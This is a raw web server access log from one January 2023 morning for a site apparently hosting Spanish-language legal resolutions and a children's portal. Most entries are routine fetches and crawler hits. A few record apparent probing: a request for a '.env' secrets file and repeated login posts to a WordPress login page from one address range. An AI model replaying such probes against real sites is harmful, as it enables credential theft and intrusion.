191.95.61.99 - - [04/Jan/2023:03:22:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%20CONJUNTAS/Resolucion%20conjunta%20No.%20001-2017.pdf HTTP/1.1" 200 332456
191.95.61.99 - - [04/Jan/2023:03:22:53 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [04/Jan/2023:03:23:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [04/Jan/2023:03:23:36 -0500] "GET /BLA/boletinlegal/.env HTTP/1.1" 404 1038
172.22.2.4 - - [04/Jan/2023:03:23:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [04/Jan/2023:03:22:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Jan/2023:03:23:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [04/Jan/2023:03:23:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53739
216.245.221.92 - - [04/Jan/2023:03:25:28 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.86 - - [04/Jan/2023:03:25:39 -0500] "-" 408 -
172.22.2.4 - - [04/Jan/2023:03:25:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
157.55.39.194 - - [04/Jan/2023:03:26:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202001/2001%20700-749.TIF HTTP/1.1" 200 8147392
185.119.81.108 - - [04/Jan/2023:03:26:38 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.108 - - [04/Jan/2023:03:26:39 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
199.16.157.180 - - [04/Jan/2023:03:27:10 -0500] "GET /images/cronica-amanda-rodriguez-30-abril.jpg HTTP/1.1" 200 26304
199.16.157.183 - - [04/Jan/2023:03:27:10 -0500] "GET /una-mujer-que-trabaja-por-la-equidad-de-genero-y-la-proteccion-del-ambiente-asi-es-amanda-rodriguez.html HTTP/1.1" 200 935
201.245.192.253 - - [04/Jan/2023:03:28:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
87.236.176.159 - - [04/Jan/2023:03:28:26 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [04/Jan/2023:03:29:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43594
201.245.192.253 - - [04/Jan/2023:03:29:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43780
172.22.2.4 - - [04/Jan/2023:03:28:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [04/Jan/2023:03:30:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Jan/2023:03:29:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
201.245.192.253 - - [04/Jan/2023:03:33:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
207.46.13.192 - - [04/Jan/2023:03:33:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202001/2001%20450-499.TIF HTTP/1.1" 200 9011146
185.119.81.105 - - [04/Jan/2023:03:33:58 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [04/Jan/2023:03:34:00 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
114.119.157.57 - - [04/Jan/2023:03:34:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/7004.pdf HTTP/1.1" 200 67875
216.245.221.92 - - [04/Jan/2023:03:35:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Jan/2023:03:34:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.83.24 - - [04/Jan/2023:03:36:57 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
172.22.2.4 - - [04/Jan/2023:03:35:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
201.245.192.253 - - [04/Jan/2023:03:38:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
185.119.81.105 - - [04/Jan/2023:03:38:37 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [04/Jan/2023:03:38:38 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [04/Jan/2023:03:39:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43594
201.245.192.253 - - [04/Jan/2023:03:39:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43780
191.95.61.99 - - [04/Jan/2023:03:39:42 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
191.95.61.99 - - [04/Jan/2023:03:39:42 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
191.95.61.99 - - [04/Jan/2023:03:39:42 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
216.245.221.92 - - [04/Jan/2023:03:40:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [04/Jan/2023:03:40:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [04/Jan/2023:03:41:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58612
201.245.192.253 - - [04/Jan/2023:03:43:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.86 - - [04/Jan/2023:03:44:11 -0500] "-" 408 -
181.78.22.67 - - [04/Jan/2023:03:45:24 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
